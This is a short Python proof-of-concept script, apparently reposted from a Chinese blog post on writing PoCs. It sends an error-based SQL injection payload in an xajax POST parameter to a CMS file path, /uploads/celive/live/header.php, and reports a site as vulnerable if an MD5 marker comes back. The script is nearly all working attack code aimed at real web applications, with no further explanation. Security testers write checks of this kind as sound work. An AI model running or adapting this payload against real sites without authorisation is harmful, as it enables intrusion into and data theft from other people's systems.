import requests
import hashlib
import sys
def verify(url):
target = "%s/uploads/celive/live/header.php" % url
post_data = {
'xajax': 'LiveMessage',
'xajaxargs[0][name]': "1',(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(select md5(233)))a from information_schema.tables group by a)b),'','','','1','192.168.110.152','2')#"
}
try:
response = requests.post(target, data=post_data)
if response:
data = response.text
if hashlib.md5("233".encode('utf-8')).hexdigest() in data:
print("%s is vulnerable" % target)
else:
print("%s is not vulnerable" % target)
except Exception:
print("sonething happend...")
def main():
args = sys.argv
url = ""
if len(args) == 2:
url = args[1]
verify(url)
else:
print("Usage: python %s url", args[0])
if __name__ == '__main__':
main()
python编写poc之1
猜你喜欢
转载自www.cnblogs.com/v01cano/p/11409519.html
今日推荐
周排行